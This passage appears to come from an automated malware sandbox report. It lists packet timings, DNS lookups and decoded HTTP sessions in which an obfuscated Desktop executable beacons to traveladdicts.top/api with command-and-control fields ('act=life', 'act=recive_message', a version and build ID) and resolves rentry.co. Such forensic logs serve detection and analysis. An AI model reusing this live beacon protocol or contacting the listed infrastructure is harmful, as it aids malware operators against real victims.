                                                                                                                                                Jan 28, 2025 16:12:35.729651928 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.729928970 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.731133938 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.731153965 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.731208086 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.218652964 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.218714952 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.218748093 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.218753099 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.218763113 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.218803883 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.218812943 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.219469070 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.219507933 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.219513893 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.219520092 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.219563007 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.219650030 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.219923019 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.219968081 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.219974995 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.223762989 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.223810911 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.223819017 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.270308018 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.304997921 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.305063963 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.305105925 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.305114985 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.305126905 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.305164099 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.305172920 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.305188894 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.305226088 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.306252003 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.306266069 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.306281090 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.306287050 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.643520117 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.643556118 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:36.643616915 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.644150972 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:36.644170046 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:37.124456882 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:37.124522924 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:37.125662088 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:37.125673056 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:37.126002073 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:37.127130985 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:37.127275944 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:37.127306938 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:40.185492039 CET4916153192.168.2.9162.159.36.2
                                                                                                                                                Jan 28, 2025 16:12:40.190345049 CET5349161162.159.36.2192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:40.193181992 CET4916153192.168.2.9162.159.36.2
                                                                                                                                                Jan 28, 2025 16:12:40.197964907 CET5349161162.159.36.2192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:40.660278082 CET4916153192.168.2.9162.159.36.2
                                                                                                                                                Jan 28, 2025 16:12:40.665208101 CET5349161162.159.36.2192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:40.665256977 CET4916153192.168.2.9162.159.36.2
                                                                                                                                                Jan 28, 2025 16:12:49.270206928 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.270323992 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.270376921 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.270710945 CET49891443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.270724058 CET44349891172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.489547968 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.489579916 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.489660025 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.490026951 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.490039110 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.974395037 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.974504948 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.975740910 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.975750923 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.976140022 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.977869987 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.977998972 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:49.978034019 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.978092909 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:50.019335985 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:01.975130081 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:01.975397110 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:01.975507021 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:01.975662947 CET49224443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:01.975686073 CET44349224172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.479950905 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.480006933 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.480103016 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.480361938 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.480381966 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.960997105 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.961071968 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.962313890 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.962322950 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.962563038 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.963694096 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963814020 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963851929 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963865042 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:02.963946104 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:02.963958025 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:04.118094921 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:04.118201971 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:04.118272066 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:04.118771076 CET49233443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:04.118789911 CET44349233172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.105122089 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.105170965 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.105242014 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.105535030 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.105549097 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.572407961 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.572468996 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.573798895 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.573803902 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.574006081 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.575083971 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.575232983 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.575257063 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:21.318743944 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:21.318943024 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:21.319001913 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:21.319134951 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:21.319149971 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:22.581994057 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:22.582036972 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:22.582118034 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:22.582518101 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:22.582540989 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.199892998 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.199996948 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.201661110 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.201687098 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.201937914 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.203213930 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.203923941 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.203962088 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.204063892 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.204102993 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.204973936 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205020905 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205168009 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205216885 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205368042 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205394030 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205539942 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205571890 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205586910 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205598116 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205673933 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205702066 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205744982 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205838919 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205877066 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.215692043 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.215924025 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.215959072 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.215982914 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.216010094 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.216049910 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.221043110 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.858297110 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.858417034 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.858481884 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.858705044 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.858728886 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.979985952 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.980010986 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.980110884 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.980469942 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.980489016 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.459238052 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.459363937 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.460798025 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.460813046 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.461050034 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.462338924 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.462338924 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.462414026 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.219438076 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.219542027 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.219680071 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:37.220115900 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:37.220136881 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.220211983 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:37.220217943 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.238804102 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.238842964 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.238913059 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.239265919 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.239284039 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.707854033 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.708029032 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.710069895 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.710082054 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.710341930 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.711605072 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.755346060 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.968720913 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.968766928 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.968796968 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.968828917 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.968914986 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.968944073 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.968944073 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.968966961 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.969304085 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.969325066 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.969356060 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.969362020 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jan 28, 2025 16:12:22.474807978 CET5820753192.168.2.91.1.1.1
                                                                                                                                                Jan 28, 2025 16:12:22.800164938 CET53582071.1.1.1192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:40.183718920 CET5354416162.159.36.2192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:40.672992945 CET5909353192.168.2.91.1.1.1
                                                                                                                                                Jan 28, 2025 16:12:40.679986000 CET53590931.1.1.1192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:49.473658085 CET6312653192.168.2.91.1.1.1
                                                                                                                                                Jan 28, 2025 16:12:49.488425016 CET53631261.1.1.1192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.229583025 CET5421953192.168.2.91.1.1.1
                                                                                                                                                Jan 28, 2025 16:13:37.237689972 CET53542191.1.1.1192.168.2.9
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Jan 28, 2025 16:12:22.474807978 CET192.168.2.91.1.1.10xedd4Standard query (0)traveladdicts.topA (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:12:40.672992945 CET192.168.2.91.1.1.10xdb27Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:12:49.473658085 CET192.168.2.91.1.1.10xd567Standard query (0)traveladdicts.topA (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:13:37.229583025 CET192.168.2.91.1.1.10xc72cStandard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Jan 28, 2025 16:12:22.800164938 CET1.1.1.1192.168.2.90xedd4No error (0)traveladdicts.top172.67.202.141A (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:12:22.800164938 CET1.1.1.1192.168.2.90xedd4No error (0)traveladdicts.top104.21.60.241A (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:12:40.679986000 CET1.1.1.1192.168.2.90xdb27Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:12:49.488425016 CET1.1.1.1192.168.2.90xd567No error (0)traveladdicts.top172.67.202.141A (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:12:49.488425016 CET1.1.1.1192.168.2.90xd567No error (0)traveladdicts.top104.21.60.241A (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:13:37.237689972 CET1.1.1.1192.168.2.90xc72cNo error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:13:37.237689972 CET1.1.1.1192.168.2.90xc72cNo error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                                                                                Jan 28, 2025 16:13:37.237689972 CET1.1.1.1192.168.2.90xc72cNo error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                                                                                • traveladdicts.top
                                                                                                                                                • rentry.co
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.949805172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:12:23 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 8
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:12:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                Data Ascii: act=life
                                                                                                                                                2025-01-28 15:12:35 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:12:35 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=1e8e509h8ptm85nk04pcq5mcm9; expires=Sat, 24 May 2025 08:59:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04xbUd0ysAc4XsqaUYVb8w12kbt5WdLWeqlvrSvvSGddExLYcxHMB4c0sxpBLzFJ3Xik5c%2Beo7awp09y%2FHYlH3vjzaOVFg1urkvMJ02SAbk9XE8aIn1ikOYG0CLbxOJ3poATag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091eba32f184303-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=1959&rtt_var=786&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1490556&cwnd=219&unsent_bytes=0&cid=cd7ab68711b2a6f6&ts=11958&x=0"
                                                                                                                                                2025-01-28 15:12:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                2025-01-28 15:12:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.949882172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:12:35 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 49
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:12:35 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d
                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl2yan1&j=
                                                                                                                                                2025-01-28 15:12:36 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:12:36 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=s01suab9v85ia1m6qs5lj4u8qs; expires=Sat, 24 May 2025 08:59:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=46rFdxah2xVEkxqwp8jMXNBGq9HXl%2FiKYXab%2Bw8RtfPfmyvDLpv33TQZ6EhdNB3vMlnPRM8Dcb4ZvuV%2BdoV0pFUHOqYGnQyB9t%2BjUX0ywuGSf%2Bqq258atqSY8VonIAxYxcqKkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ebefbd3a8c29-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1824&rtt_var=695&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=950&delivery_rate=1563169&cwnd=189&unsent_bytes=0&cid=4fa1ec4b84de33f5&ts=494&x=0"
